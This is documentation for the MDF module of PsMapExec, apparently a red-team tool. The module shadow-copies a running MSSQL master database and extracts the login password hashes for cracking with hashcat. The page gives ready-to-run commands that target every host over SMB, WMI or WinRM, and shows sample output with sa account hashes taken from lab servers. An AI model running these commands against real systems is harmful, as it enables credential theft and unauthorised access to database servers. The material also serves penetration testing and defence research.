MDF

This module creates a Volume Shadow Copy of the running MSSQL database, allowing the master.mdf file to be safely copied even while in use. It then extracts the login password hashes found within the master database ready to be cracked with hashcat.

Based on Invoke-MDF Which is based on the original work of XPN

Supported Methods

• SMB

• SessionHunter

• WMI

• WinRM

Parameter	Value	Description
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -targets All -Module MDF -ShowOutput

PsMapExec WinRM -Targets servers -Module mdf -ShowOutput

WinRM   172.16.109.187  sql03.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\632364668.mdf

Name  : sa
Value : 0x020050B40C7843AC5C196F9375549D3566583A5C5D2E888353D0C3F9C973446A0

WinRM   172.16.109.188  sql11.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\1390080740.mdf

Name  : sa
Value : 0x02003D821CF3B3D1DE294A3CFED043AD755B33D3258A39A706B3AA282F72A81D50